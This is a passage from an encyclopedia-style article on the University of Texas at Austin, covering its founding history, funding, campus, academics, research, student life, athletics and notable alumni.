government. After Texas obtained its independence from Mexico in 1836, the Texas Congress adopted the Constitution of the Republic, which, under Section 5 of its General Provisions, stated "It shall be the duty of Congress, as soon as circumstances will permit, to provide, by law, a general system of education." On April 18, 1838, "An Act to Establish the University of Texas" was referred to a special committee of the Texas Congress, but was not reported back for further action. On January 26, 1839, the Texas Congress agreed to set aside fifty leagues of land—approximately —towards the establishment of a publicly funded university. In addition, in the new capital of Austin were reserved and designated "College Hill". (The term "Forty Acres" is colloquially used to refer to the University as a whole. The original 40 acres is the area from Guadalupe to Speedway and 21st Street to 24th Street.) In 1845, Texas was annexed into the United States. The state's Constitution of 1845 failed to mention higher education. On February 11, 1858, the Seventh Texas Legislature approved O.B. 102, an act to establish the University of Texas, which set aside $100,000 in United States bonds toward construction of the state's first publicly funded university (the $100,000 was an allocation from the $10 million the state received pursuant to the Compromise of 1850 and Texas's relinquishing claims to lands outside its present boundaries). The legislature also designated land reserved for the encouragement of railroad construction toward the university's endowment. On January 31, 1860, the state legislature, wanting to avoid raising taxes, passed an act authorizing the money set aside for the University of Texas to be used for frontier defense in west Texas to protect settlers from the alleged attacks of Native peoples. Texas's secession from the Union and the American Civil War delayed repayment of the borrowed monies. At the end of the Civil War in 1865, The University of Texas's endowment was just over $16,000 in warrants and nothing substantive had been done to organize the university's operations. This effort to establish a University was again mandated by Article 7, Section 10 of the Texas Constitution of 1876 which directed the legislature to "establish, organize and provide for the maintenance, support and direction of a university of the first class, to be located by a vote of the people of this State, and styled "The University of Texas". Additionally, Article 7, Section 11 of the 1876 Constitution established the Permanent University Fund, a sovereign wealth fund managed by the Board of Regents of the University of Texas and dedicated to the maintenance of the university. Because some state legislators perceived an extravagance in the construction of academic buildings of other universities, Article 7, Section 14 of the Constitution expressly prohibited the legislature from using the state's general revenue to fund construction of university buildings. Funds for constructing university buildings had to come from the university's endowment or from private gifts to the university, but the university's operating expenses could come from the state's general revenues. The 1876 Constitution also revoked the endowment of the railroad lands of the Act of 1858, but dedicated of land, along with other property appropriated for the university, to the Permanent University Fund. This was greatly to the detriment of the university as the lands the Constitution of 1876 granted the university represented less than 5% of the value of the lands granted to the university under the Act of 1858 (the lands close to the railroads were quite valuable, while the lands granted the university were in far west Texas, distant from sources of transportation and water). The more valuable lands reverted to the fund to support general education in the state (the Special School Fund). On April 10, 1883, the legislature supplemented the Permanent University Fund with another of land in west Texas granted to the Texas and Pacific Railroad but returned to the state as seemingly too worthless to even survey. The legislature additionally appropriated $256,272.57 to repay the funds taken from the university in 1860 to pay for frontier defense and for transfers to the state's General Fund in 1861 and 1862. The 1883 grant of land increased the land in the Permanent University Fund to almost 2.2 million acres. Under the Act of 1858, the university was entitled to just over of land for every mile of railroad built in the state. Had the 1876 Constitution not revoked the original 1858 grant of land, by 1883, the university lands would have totaled 3.2 million acres, so the 1883 grant was to restore lands taken from the university by the 1876 Constitution, not an act of munificence. On March 30, 1881, the legislature set forth the university's structure and organization and called for an election to establish its location. By popular election on September 6, 1881, Austin (with 30,913 votes) was chosen as the site. Galveston, having come in second in the election (with 20,741 votes), was designated the location of the medical department (Houston was third with 12,586 votes). On November 17, 1882, on the original "College Hill," an official ceremony commemorated the laying of the cornerstone of the Old Main building. University President Ashbel Smith, presiding over the ceremony, prophetically proclaimed "Texas holds embedded in its earth rocks and minerals which now lie idle because unknown, resources of incalculable industrial utility, of wealth and power. Smite the earth, smite the rocks with the rod of knowledge and fountains of unstinted wealth will gush forth." The University of Texas officially opened its doors on September 15, 1883. Expansion and growth In 1890, George Washington Brackenridge donated $18,000 for the construction of a three-story brick mess hall known as Brackenridge Hall (affectionately known as "B.Hall"), one of the university's most storied buildings and one that played an important place in university life until its demolition in 1952. The old Victorian-Gothic Main Building served as the central point of the campus's site, and was used for nearly all purposes. But by the 1930s, discussions arose about the need for new library space, and the Main Building was razed in 1934 over the objections of many students and faculty. The modern-day tower and Main Building were constructed in its place. In 1910, George Washington Brackenridge again displayed his philanthropy, this time donating on the Colorado River to the university. A vote by the regents to move the campus to the donated land was met with outrage, and the land has only been used for auxiliary purposes such as graduate student housing. Part of the tract was sold in the late-1990s for luxury housing, and there are controversial proposals to sell the remainder of the tract. The Brackenridge Field Laboratory was established on of the land in 1967. In 1916, Gov. James E. Ferguson became involved in a serious quarrel with the University of Texas. The controversy grew out of the board of regents' refusal to remove certain faculty members whom the governor found objectionable. When Ferguson found he could not have his way, he vetoed practically the entire appropriation for the university. Without sufficient funding, the university would have been forced to close its doors. In the middle of the controversy, Ferguson's critics brought to light a number of irregularities on the part of the governor. Eventually, the Texas House of Representatives prepared 21 charges against Ferguson, and the Senate convicted him on 10 of them, including misapplication of public funds and receiving $156,000 from an unnamed source. The Texas Senate removed Ferguson as governor and declared him ineligible to hold office. In 1921, the legislature appropriated $1.35 million for the purchase of land next to the main campus. However, expansion was hampered by the restriction against using state revenues to fund construction of university buildings as set forth in Article 7, Section 14 of the Constitution. With the completion of Santa Rita No. 1 well and the discovery of oil on university-owned lands in 1923, the university added significantly to its Permanent University Fund. The additional income from Permanent University Fund investments allowed for bond issues in 1931 and 1947, which allowed the legislature to address funding for the university along with the Agricultural and Mechanical College (now known as Texas A&M University). With sufficient funds to finance construction on both campuses, on April 8, 1931, the Forty Second Legislature passed H.B. 368. which dedicated the Agricultural and Mechanical College a 1/3 interest in the Available University Fund, the annual income from Permanent University Fund investments. The University of Texas was inducted into the Association of American Universities in 1929. During World War II, the University of Texas was one of 131 colleges and universities nationally that took part in the V-12 Navy College Training Program which offered students a path to a Navy commission. In the fall of 1956, the first Black students entered the university's undergraduate class. Black students were permitted to live in campus dorms, but were barred from campus cafeterias. The University of Texas integrated its facilities and desegregated its dormitories in 1965. UT, which had had an open admissions policy, adopted standardized testing for admissions in the mid-1950s, at least in part as a conscious strategy to minimize the number of Black undergraduates, given that they were no longer able to simply bar their entry after the Brown decision Following growth in enrollment after World War II, the university unveiled an ambitious master plan in 1960 designed for "10 years of growth" that was intended to "boost the University of Texas into the ranks of the top state universities in the nation." In 1965, the Texas Legislature granted the university Board of Regents to use eminent domain to purchase additional properties surrounding the original . The university began buying parcels of land to the north, south, and east of the existing campus, particularly in the Blackland neighborhood to the east and the Brackenridge tract to the southeast, in hopes of using the land to relocate the university's intramural fields, baseball field, tennis courts, and parking lots. On March 6, 1967, the Sixtieth Texas Legislature changed the university's official name from "The University of Texas" to "The University of Texas at Austin" to reflect the growth of the University of Texas System. 1966 shooting On August 1, 1966, Texas student Charles Whitman barricaded the observation deck in the tower of the Main Building. Armed with multiple firearms, he killed 14 people on campus, 11 from the observation deck and below the clocks on the tower, and three more in the tower, as well as wounding two others inside the observation deck. The massacre ended when Whitman was shot and killed by police after they breached the tower. After the Whitman event, the observation deck was closed until 1968 and then closed again in 1975 following a series of suicide jumps during the 1970s. In 1999, after installation of security fencing and other safety precautions, the tower observation deck reopened to the public. There is a turtle pond park near the tower dedicated to those affected by the tragedy. Recent history The first presidential library on a university campus was dedicated on May 22, 1971, with former President Johnson, Lady Bird Johnson and then-President Richard Nixon in attendance. Constructed on the eastern side of the main campus, the Lyndon Baines Johnson Library and Museum is one of 13 presidential libraries administered by the National Archives and Records Administration. A statue of Martin Luther King Jr. was unveiled on campus in 1999 and subsequently vandalized. By 2004, John Butler, a professor at the McCombs School of Business suggested moving it to Morehouse College, a historically black college, "a place where he is loved". The University of Texas at Austin has experienced a wave of new construction recently with several significant buildings. On April 30, 2006, the school opened the Blanton Museum of Art. In August 2008, the AT&T Executive Education and Conference Center opened, with the hotel and conference center forming part of a new gateway to the university. Also in 2008, Darrell K Royal-Texas Memorial Stadium was expanded to a seating capacity of 100,119, making it the largest stadium (by capacity) in the state of Texas at the time. On January 19, 2011, the university announced the creation of a 24-hour television network in partnership with ESPN, dubbed the Longhorn Network. ESPN agreed to pay a $300 million guaranteed rights fee over 20 years to the university and to IMG College, the school's multimedia rights partner. The network covers the university's intercollegiate athletics, music, cultural arts, and academics programs. The channel first aired in September 2011. In 2021, UT Austin leaders worked with Dan Patrick, Lieutenant General of Texas, and private donors to set up a Liberty Institute at the university. In 2022, Patrick said that the Liberty Institute was created to restrict teaching about critical race theory. Patrick's remarks sparked concerns about academic freedom and freedom of thought on campus. Campus The university's property totals , comprising the for the Main Campus in central Austin and the J. J. Pickle Research Campus in north Austin and the other properties throughout Texas. The main campus has 150 buildings totaling over . One of the University's most visible features is the Beaux-Arts Main Building, including a tower designed by Paul Philippe Cret. Completed in 1937, the Main Building is in the middle of campus. The tower usually appears illuminated in white light in the evening but is lit burnt orange for various special occasions, including athletic victories and academic accomplishments; conversely, it is darkened for solemn occasions. At the top of the tower is a carillon of 56 bells, the largest in Texas. Songs are played on weekdays by student carillonneurs, in addition to the usual pealing of Westminster Quarters every quarter-hour between 6 a.m. and 9 p.m. In 1998, after the installation of security and safety measures, the observation deck reopened to the public indefinitely for weekend tours. The university's seven museums and seventeen libraries hold over nine million volumes, making it the seventh-largest academic library in the country. The holdings of the university's Harry Ransom Humanities Research Center include one of only 21 remaining complete copies of the Gutenberg Bible and the first permanent photograph, View from the Window at Le Gras, taken by Nicéphore Niépce. The newest museum, the Blanton Museum of Art, is the largest university art museum in the United States and hosts approximately 17,000 works from Europe, the United States, and Latin America. The Perry–Castañeda Library, which houses the central University Libraries operations and the Perry–Castañeda Library Map Collection, is at the heart of campus. The Benson Latin American Collection holds the largest collection of Latin American materials among US university libraries, and maintains substantial digital collections. The University of Texas at Austin has an extensive tunnel system that links the buildings on campus. Constructed in the 1930s under the supervision of creator Carl Eckhardt, then head of the physical plant, the tunnels have grown along with the university campus. They measure approximately six miles in length. The tunnel system is used for communications and utility service. It is closed to the public and guarded by silent alarms. Since the late 1940s, the university has generated its own electricity. Today its natural gas cogeneration plant has a capacity of 123 MW. The university also operates a TRIGA nuclear reactor at the J. J. Pickle Research Campus. The university continues to expand its facilities on campus. In 2010, the university opened the state-of-the-art Norman Hackerman building (on the site of the former Experimental Sciences Building) housing chemistry and biology research and teaching laboratories. In 2010, the university broke ground on the $120 million Bill & Melinda Gates Computer Science Complex and Dell Computer Science Hall and the $51 million Belo Center for New Media, both of which are now complete. The new LEED gold-certified, Student Activity Center (SAC) opened in January 2011, housing study rooms, lounges and food vendors. The SAC was constructed as a result of a student referendum passed in 2006 which raised student fees by $65 per semester. In 2012, the Moody Foundation awarded the College of Communication $50 million, the largest endowment any communication college has received, so naming it the Moody College of Communication. The university operates two public radio stations, KUT with news and information, and KUTX with music, via local FM broadcasts as well as live streaming audio over the Internet. The university uses Capital Metro to provide bus transportation for students around the campus on the UT Shuttle system and throughout Austin. Organization and administration The university contains eighteen colleges and schools and one academic unit, each listed with its founding date: Cockrell School of Engineering (1894) Dell Medical School (2013) College of Education (1905) College of Fine Arts (1938) College of Liberal Arts (1883) College of Natural Sciences (1883) College of Pharmacy (1893 in Galveston, moved to Austin 1927) Continuing Education (1909) Graduate Studies (1910) Jackson School of Geosciences (2005) LBJ School of Public Affairs (1970) McCombs School of Business (1922) Moody College of Communication (1965) School of Architecture (1948) School of Information (1948) School of Law (1883) School of Nursing (1976) School of Undergraduate Studies (2008) Steve Hicks School of Social Work (1950) Academics The University of Texas at Austin offers more than 100 undergraduate and 170 graduate degrees. In the 2009–2010 academic year, the university awarded a total of 13,215 degrees: 67.7% bachelor's degrees, 22.0% master's degrees, 6.4% doctoral degrees, and 3.9% Professional degrees. In addition, the university has eight highly selective honors programs, seven of which span a variety of academic fields: Liberal Arts Honors, the Business Honors Program, the Turing Scholars Program in Computer Science, Engineering Honors, the Dean's Scholars Program in Natural Sciences, the Health Science Scholars Program in Natural Sciences, and the Polymathic Scholars Program in Natural Sciences. The eighth is the Plan II Honors Program, a rigorous interdisciplinary program that is a major in and of itself. Many Plan II students pursue a second major, often participating in another department's honors program in addition to Plan II. The university also offers programs such as the Freshman Research Initiative and Texas Interdisciplinary Plan. Admission The University of Texas at Austin is one of the most selective universities in the region. Relative to other universities in the state of Texas, UT Austin is second to Rice University in selectivity according to a Business Journal study weighing acceptance rates and the mid-range of the SAT and ACT. The University of Texas at Austin was ranked as the 18th most selective in the South. As a state public university, UT Austin was subject to Texas House Bill 588, which guaranteed Texas high school seniors graduating in the top 10% of their class admission to any public Texas university. A new state law granting UT Austin (but no other state university) a partial exemption from the top 10% rule, Senate Bill 175, was passed by the 81st Legislature in 2009. It modified this admissions policy by limiting automatically admitted freshmen to 75% of the entering in-state freshman class, starting in 2011. The university will admit the top one percent, the top two percent and so forth until the cap is reached; the university currently admits the top 6 percent. Furthermore, students admitted under Texas House Bill 588 are not guaranteed their choice of college or major, but rather only guaranteed admission to the university as a whole. Many colleges, such as the Cockrell School of Engineering, have secondary requirements that must be met for admission. For others who go through the traditional application process, selectivity is deemed "more selective" according to the Carnegie Foundation for the Advancement of Teaching and by U.S. News & World Report. For Fall 2017, 51,033 applied and 18,620 were accepted (36.5%), and of those accepted, 45.2% enrolled. Among freshman students who enrolled in Fall 2017, SAT scores for the middle 50% ranged from 570 to 690 for critical reading and 600–710 for math. ACT composite scores for the middle 50% ranged from 26 to 31. In terms of class rank, 74.4% of enrolled freshmen were in the top 10% of their high school classes and 91.7% ranked in the top quarter. For Fall 2019, 53,525 undergraduate students applied, 17,029 undergraduate students were admitted, and 8,170 undergraduate students enrolled in the university full or part time making the enrollment rate 31.8% overall. Rankings The University of Texas at Austin (UT Austin) was ranked tied for 38th among all universities in the U.S., and tied for 10th place among public universities according to U.S. News & World Reports 2022 rankings. Internationally, UT Austin was ranked 34th in the 2020 "Best Global Universities" ranking by U.S. News & World Report, 45th in the world by Academic Ranking of World Universities (ARWU) in 2019, 39th worldwide by Times Higher Education World University Rankings (2019), and 65th globally by QS World University Rankings (2020). UT Austin was also ranked 31st in the world by the Center for World University Rankings (CWUR). The University of Texas at Austin is considered to be a "Public Ivy"—a public university that provides an Ivy League collegiate experience at a public school price, having been ranked in virtually every list of "Public Ivies" since Richard Moll coined the term in his 1985 book Public Ivies: A Guide to America's best public undergraduate colleges and universities. The seven other "Public Ivy" universities, according to Moll, were The College of William & Mary, Miami University, The University of California, The University of Michigan, The University of North Carolina, The University of Vermont, and The University of Virginia. In its 2016 edition of college rankings, U.S. News & World Report ranked the Accounting and Latin American History programs as the top in the nation and more than 50 other science, humanities, and professional programs rank in the top 25 nationally. The College of Pharmacy is listed as the third-best in the nation and The School of Information (iSchool) is sixth-best in Library and Information Sciences. Among other rankings, the School of Social Work is 7th, the Jackson School of Geosciences is 8th for Earth Sciences, the Cockrell School of Engineering is tied for 10th-best (with the undergraduate engineering program tied for 11th-best in the country), the Nursing School is tied for 13th, the University of Texas School of Law is 15th, the Lyndon B. Johnson School of Public Affairs is 7th, and the McCombs School of Business is tied for 16th-best (with the undergraduate business program tied for 5th-best in the country). The University of Texas School of Architecture was ranked second among national undergraduate programs in 2012. A 2005 Bloomberg survey ranked the school 5th among all business schools and first among public business schools for the largest number of alumni who are S&P 500 CEOs. Similarly, a 2005 USA Today report ranked the university as "the number one source of new Fortune 1000 CEOs". A "payback" analysis published by SmartMoney in 2011 comparing graduates' salaries to tuition costs concluded the school was the second-best value of all colleges in the nation, behind only Georgia Tech. A 2013 College Database study found that UT Austin was 22nd in the nation in terms of increased lifetime earnings by graduates. Research UT Austin is classified among "R1: Doctoral Universities – Very high research activity." For the 2014–2015 cycle, the university was awarded over $580 million in sponsored projects, and has earned more than 300 patents since 2003. The University of Texas at Austin houses the Office of Technology Commercialization, a technology transfer center which serves as the bridge between laboratory research and commercial development. In 2009, the university created nine new start-up companies to commercialize technology developed at the university and has created 46 start-ups in the past seven years. License agreements generated $10.9 million in revenue for the university in 2009. Research at UT Austin is largely focused in the engineering and physical sciences, and the university is a world-leading research institution in fields such as computer science. Energy is a major research thrust, with federally funded projects on biofuels, battery and solar cell technology, and geological carbon dioxide storage, water purification membranes, among others. In 2009, the University of Texas founded the Energy Institute, led by former Under Secretary for Science Raymond L. Orbach, to organize and advance multi-disciplinary energy research. In addition to its own medical school, it houses medical programs associated with other campuses and allied health professional programs, as well as major research programs in pharmacy, biomedical engineering, neuroscience, and others. In 2010, the University of Texas at Austin opened the $100 million Dell Pediatric Research Institute to increase medical research at the university and establish a medical research complex, and associated medical school, in Austin. The university operates several major auxiliary research centers. The world's third-largest telescope, the Hobby–Eberly Telescope, and three other large telescopes are part of the university's McDonald Observatory, west of Austin. The university manages nearly of biological field laboratories, including the Brackenridge Field Laboratory in Austin. The Center for Agile Technology focuses on software development challenges. The J.J. Pickle Research Campus (PRC) is home to the Texas Advanced Computing Center which operates a series of supercomputers, such as Ranger (from 2008 to 2013 ), Stampede (2013–2017 ), Stampede2 (since 2017 ), and Frontera (since 2019). The Pickle campus also hosts the Microelectronics Research Center which houses micro- and nanoelectronics research and features a cleanroom for device fabrication. Founded in 1946, the university's Applied Research Laboratories at the PRC has developed or tested the vast majority of the Navy's high-frequency sonar equipment. In 2007, the Navy granted it a research contract funded up to $928 million over ten years. The Institute for Advanced Technology, founded in 1990 and located in the West Pickle Research Building, supports the U.S. Army with basic and applied research in several fields. The Center for Transportation Research is a nationally recognized research institution focusing on transportation research, education, and public service. Established in 1963 as the Center for Highway Research, its projects address virtually all aspects of transportation, including economics, multimodal systems, traffic congestion relief, transportation policy, materials, structures, transit, environmental impacts, driver behavior, land use, geometric design, accessibility, and pavements. In 2013, the University of Texas at Austin announced the naming of the O'Donnell Building for Applied Computational Engineering and Sciences. The O'Donnell Foundation of Dallas, headed by Peter O'Donnell and his wife, Edith Jones O'Donnell, has given more than $135 million to the university between 1983 and 2013. University president William C. Powers declared the O'Donnells "among the greatest supporters of the University of Texas in its 130-year history. Their transformative generosity is based on the belief in our power to change society for the better." In 2008, O'Donnell pledged $18 million to finance the hiring of university faculty members undertaking research in mathematics, computers, and multiple scientific disciplines; his pledge was matched by W. A. "Tex" Moncrief Jr., an oilman and philanthropist from Fort Worth. The University of Texas at Austin Marine Science Institute is located on the Gulf coast in Port Aransas. Established in 1941, UTMSI was the first permanent marine research facility in the state of Texas and has since contributed significantly to our understanding of marine ecosystems. Research at the Marine Science Institute ranges from locally-important work on mariculture and estuarine ecosystems to the investigation of global issues in marine science, from the Arctic to the tropics. Endowment The University of Texas System is entitled to at least 30% of the distributions from the Permanent University Fund (PUF), with over $33 billion in assets as of year-end 2021. The University of Texas System gets two-thirds of the Available University Fund (the name of the annual distribution of PUF's income), and the Texas A&M University System gets the other third. A regental policy requires at least 45 percent of UT System's share of this money go to the University of Texas at Austin for "program enrichment". By taking two-thirds and multiplying it by 45 percent, UT gets 30 percent, which is the minimum amount of AUF income that can be distributed to the school under current policies. The Regents, however, can decide to allocate additional amounts to the university. Also, the majority of the University of Texas system share of the AUF is used for its debt service bonds, some of which were issued for the benefit of the Austin campus. The Regents can change the 45 percent minimum of the University of Texas System share to goes to the Austin campus at any time, although doing so might be difficult politically. Proceeds from lands appropriated in 1839 and 1876, as well as oil monies, comprise the majority of PUF. At one time, the PUF was the chief source of income for Texas' two university systems, the University of Texas System and the Texas A&M University System; today, however, its revenues account for less than 10 percent of the universities' annual budgets. This has challenged the universities to increase sponsored research and private donations. Privately funded endowments contribute over $2 billion to the university's total endowment. The University of Texas System also has about $22 billion of assets in its General Endowment Fund. Student life Student profile For Fall 2011, the university enrolled 38,437 undergraduate, 11,497 graduate and 1,178 law students. Out-of-state and international students comprised 9.1% of the undergraduate student body and 20.1% of the total student body, with students from all 50 states and more than 120 foreign countries—most notably, the Republic of Korea, followed by the People's Republic of China, India, Mexico, and Taiwan. For Fall 2015, the undergraduate student body was 48.9% male and 51.1% female. The three largest undergraduate majors in 2009 were Biological Sciences, Unspecified Business, and Psychology, while the three largest graduate majors were Business Administration (MBA), Electrical and Computer Engineering, and Pharmacy (PharmD). Residential life The campus has fourteen residence halls, the newest of which opened in Spring 2007. On-campus housing can hold more than 7,100 students. Jester Center is the largest residence hall with its capacity of 2,945. Academic enrollment exceeds the on-campus housing capacity; as a result, most students must live in private residence halls, housing cooperatives, apartments, or with Greek organizations and other off-campus residences. University Housing and Dining, which already has the largest market share of 7,000 of the estimated 27,000 beds in the campus area, plans to expand to 9,000 beds. Student organizations The university recognizes more than 1,300 student organizations. In addition, it supports three official student governance organizations that represent student interests to faculty, administrators, and the Texas Legislature. Student Government, established in 1902, is the oldest governance organization and represents student interests in general. The Senate of College Councils represents students in academic affairs and coordinates the college councils, and the Graduate Student Assembly represents graduate student interests. The University Unions Student Events Center serves as the hub for student activities on campus. The Friar Society serves as the oldest honor society at the university and recognizes students who have made significant contributions to the school. Texas Orange Jackets, founded in 1923, is the oldest women's honorary service organization on campus and empowers young women leaders to serve the campus and community. The Texas Blazers, an honorary service organization, act as official hosts of the university. Texas 4000 for Cancer is another student organization, which also doubles as an Austin-based nonprofit, that hosts a 4,500-mile bike ride from Austin, Texas to Anchorage, Alaska, thus far raising over $5 million for cancer research and patient support services since its inception in 2004. Greek life The University of Texas at Austin is home to an active Greek community. Approximately 14 percent of undergraduate students are in fraternities or sororities. With more than 65 national chapters, the university's Greek community is one of the nation's largest. These chapters are under the authority of one of the school's six Greek council communities, Interfraternity Council, National Pan-Hellenic Council, Texas Asian Pan-Hellenic Council, Latino Pan-Hellenic Council, Multicultural Greek Council and University Panhellenic Council. Other registered student organizations also name themselves with Greek letters and are called affiliates. They are not a part of one of the six councils but have all of the same privileges and responsibilities of any other organization. Most Greek houses are west of the Drag in the West Campus neighborhood. Media Students express their opinions in and out of class through periodicals including Study Breaks magazine, Longhorn Life, The Daily Texan (the most award-winning daily college newspaper in the United States), and the Texas Travesty. Over the airwaves students' voices are heard through Texas Student Television (K29HW-D) and KVRX Radio. The Computer Writing and Research Lab of the university's Department of Rhetoric and Writing also hosts the Blogora, a blog for "connecting rhetoric, rhetorical methods and theories, and rhetoricians with public life" by the Rhetoric Society of America. Traditions Traditions at the University of Texas are perpetuated through several school symbols and mediums. At athletic events, students frequently sing "Texas Fight", the university's fight song while displaying the Hook 'em Horns hand gesture—the gesture mimicking the horns of the school's mascot, Bevo the Texas Longhorn. Athletics The University of Texas offers a wide variety of varsity and intramural sports programs. On June 12, 2020, UT student-athletes banded together with their #WeAreOne statement on Twitter. Among the list of changes included: renaming certain campus buildings, replacing statues, starting outreach programs, and replacing "The Eyes of Texas." UT Interim President Jay Hartzell released a statement on July 13, 2020, announcing the changes to be implemented in light of these demands from UT student-athletes. Hartzell said the university would make a multi-million dollar investment to programs that recruit, retain and support Black students; rename the Robert L. Moore Building as the Physics, Math and Astronomy Building; honor Heman M. Sweatt in numerous ways, including placing a statue of Sweatt near the entrance of  T.S. Painter Hall; honor the Precursors, the first Black undergraduates to attend The University of Texas at Austin, by commissioning a new monument on the East Mall; erect a statue for Julius Whittier, the Longhorns’ first Black football letterman, at DKR-Texas Memorial Stadium; and more. However, one of the most controversial topics on the list – replacing "The Eyes of Texas" as UT's alma mater – remained untouched. Varsity sports The university's men's and women's athletics teams are nicknamed the Longhorns. Texas has won 50 total national championships, 42 of which are NCAA national championships. The football team experienced its greatest success under coach Darrell Royal, winning three national championships in 1963, 1969, and 1970. It won a fourth title under head coach Mack Brown in 2005 after a 41–38 victory over previously undefeated Southern California in the 2006 Rose Bowl. The University's baseball team has made more trips to the College World Series (35) than any other school, and won championships in 1949, 1950, 1975, 1983, 2002, and 2005. Additionally, the university's men's and women's swimming and diving teams lay claim to sixteen NCAA Division I titles, with the men's team having 13 of those titles, more than any other Division 1 team. The swim team was first developed under Coach Tex Robertson. Notable people Faculty In the Fall of 2016, the school employed 3,128 full-time faculty members, with a student-to-faculty ratio of 18.86 to 1. These include winners of the Nobel Prize, the Pulitzer Prize, the National Medal of Science, the National Medal of Technology, the Turing Award, the Primetime Emmy Award, and other various awards. Nine Nobel Laureates are or have been affiliated with the University of Texas at Austin. Research expenditures for the university exceeded $679.8 million in fiscal year 2018. Alumni Texas Exes is the official University of Texas alumni organization. The Alcalde, founded in 1913 and pronounced "all-call-day," is the university's alumni magazine. At least 15 graduates have served in the U.S. Senate or U.S. House of Representatives, including Lloyd Bentsen '42, who served in both Houses. Presidential cabinet members include former U.S. Secretaries of State Rex Tillerson '75, and James Baker '57, former U.S. Secretary of Education William J. Bennett, and former U.S. Secretary of Commerce Donald Evans '73. Former First Lady Laura Bush '73 and daughter Jenna '04 both graduated from Texas, as well as former First Lady Lady Bird Johnson '33 & '34 and her eldest daughter Lynda. In foreign governments, the university has been represented by Fernando Belaúnde Terry '36 (42nd President of Peru) and by Abdullah al-Tariki (co-founder of OPEC). Additionally, the Prime Minister of the Palestinian National Authority, Salam Fayyad, graduated from the university with a PhD in economics. Tom C. Clark, J.D. '22, served as United States Attorney General from 1945 to 1949 and as an Associate Justice of the Supreme Court of the United States from 1949 to 1967. Alumni in academia include the 26th President of The College of William & Mary Gene Nichol '76, the 10th President of Boston University Robert A. Brown '73 & '75, and the 8th President of the University of Southern California John R. Hubbard. The university also graduated Alan Bean '55, the fourth man to walk on the Moon. Additionally, alumni who have served as business leaders include Secretary of State and former ExxonMobil Corporation CEO Rex Tillerson '75, Dell founder and CEO Michael Dell, and Gary C. Kelly, Southwest Airlines's CEO. In literature and journalism, the school boasts 20 Pulitzer Prizes to 18 former students, including Gail Caldwell and Ben Sargent '70. Walter Cronkite, the former CBS Evening News anchor once called the most trusted man in America, attended the University of Texas at Austin, as did CNN anchor Betty Nguyen '95. Alumnus J. M. Coetzee also received the 2003 Nobel Prize in Literature. Novelist Raymond Benson ('78) was the official author of James Bond novels between 1996 and 2002, the only American to be commissioned to pen them. Donna Alvermann, a distinguished research professor at the University of Georgia, Department of Education also graduated from the University of Texas, as did Wallace Clift ('49) and Jean Dalby Clift ('50, J.D. '52), authors of several books in the fields of psychology of religion and spiritual growth. Notable alumni authors also include Kovid Gupta ('2010), author of several bestselling books, Ruth Cowan Nash ('23), America's first woman war correspondent, and Alireza Jafarzadeh, author of "The Iran Threat: President Ahmadinejad and the Coming Nuclear Crisis" and television commentator ('82, MS). Although expelled from the university, former student and The Daily Texan writer John Patric went on to become a noted writer for National Geographic, Reader's Digest, and author of 1940s best-seller Why Japan was Strong. University of Texas at Austin alumni also include 112 Fulbright Scholars, 31 Rhodes Scholars, 28 Truman Scholars, 23 Marshall Scholars, and nine astronauts. Several musicians and entertainers attended the university. Janis Joplin, the American singer posthumously inducted into the Rock and Roll Hall of Fame who received a Grammy Lifetime Achievement Award, attended the university, as did February 1955 Playboy Playmate of the Month and Golden Globe recipient Jayne Mansfield. Composer Harold Morris is a 1910 graduate. Noted film director, cinematographer, writer, and editor Robert Rodriguez is a Longhorn, as are actors Eli Wallach and Matthew McConaughey, the latter of which now teaches a class at the university. Rodriguez dropped out of the university after two years to pursue his career in Hollywood, but completed his degree from the Radio-Television-Film department on May 23, 2009. Rodriguez also gave the keynote address at the university-wide commencement ceremony. Radio-Television-Film alumni Mark Dennis and Ben Foster took their award-winning feature film, Strings, to the American film festival circuit in 2011. Web and television actress Felicia Day and film actress Renée Zellweger attended the university. Day graduated with degrees in music performance (violin) and mathematics, while Zellweger graduated with a BA in English. Writer and recording artist Phillip Sandifer graduated with a degree in History. Michael "Burnie" Burns is an actor, writer, film director and film producer who graduated with a degree in Computer Science. He, along with graduate Matt Hullum, also founded the Austin-based production company Rooster Teeth, that produces many hit shows, including the award-winning Internet series, Red vs. Blue. Farrah Fawcett, one of the original Charlie's Angels, left after her junior year to pursue a modeling career. Actor Owen Wilson and writer/director Wes Anderson attended the university, where they wrote Bottle Rocket together, which became Anderson's first feature film. Writer and producer Charles Olivier is a Longhorn. So too are filmmakers and actors Mark Duplass and his brother Jay Duplass, key contributors to the mumblecore film genre. Another notable writer, Rob Thomas graduated with a BA in History in 1987 and later wrote the young adult novel Rats Saw God and created the series Veronica Mars. Illustrator, writer and alum Felicia Bond is best known for her illustrations in the If You Give... children's books series, starting with If You Give a Mouse a Cookie. Taiwanese singer-songwriter, producer, actress Cindy Yen (birth name Cindy Wu) graduated with double degrees in Music (piano performance) and Broadcast Journalism in 2008. Noted composer and arranger Jack Cooper received his D.M.A. in 1999 from The University of Texas at Austin in composition and has gone on to teach in higher education and become known internationally through the music publishing industry. Actor Trevante Rhodes competed as a sprinter for the Longhorns and graduated with a BS in Applied Learning and Development in 2012. In 2016, he starred as Chiron in the Academy Award- and Golden Globe-winning film Moonlight. Many alumni have found success in professional sports. Legendary pro football coach Tom Landry '49 attended the university as an industrial engineering major but interrupted his education after a semester to serve in the United States Army Air Corps during World War II. Following the war, he returned to the university and played fullback and defensive back on the Longhorns' bowl-game winners on New Year's Day of 1948 and 1949. Seven-time Cy Young Award-winner Roger Clemens entered the MLB after helping the Longhorns win the 1983 College World Series. NBA MVP and four-time scoring champion Kevin Durant entered the 2007 NBA Draft and was selected second overall behind Greg Oden, after sweeping National Player of the Year honors, becoming the first freshman to win any of the awards. After becoming the first freshman in school history to lead Texas in scoring and being named the Big 12 Freshman of the Year, Daniel Gibson entered the 2006 NBA draft and was selected in the second round by the Cleveland Cavaliers. In his one year at Texas, golfer Jordan Spieth led the University of Texas Golf club to the NCAA Men's Golf Championship in 2012 and went on to win The Masters Tournament three years after leaving the university. Several Olympic medalists have also attended the school, including 2008 Summer Olympics athletes Ian Crocker '05 (swimming world record holder and two-time Olympic gold medalist) and 4 × 400 m relay defending Olympic gold medalist Sanya Richards '06. Mary Lou Retton (the first female gymnast outside Eastern Europe to win the Olympic all-around title, five-time Olympic medalist, and 1984 Sports Illustrated Sportswoman of the Year) also attended the university. Garrett Weber-Gale, a two-time Olympic gold medalist, and world record-holder in two events, was a swimmer for the school. Also an alumnus is Dr. Robert Cade, the inventor of the sports drink Gatorade. In big, global philanthropy, the university is honored by Darren Walker, president of Ford Foundation. Other notable alumni include prominent businessman Red McCombs, 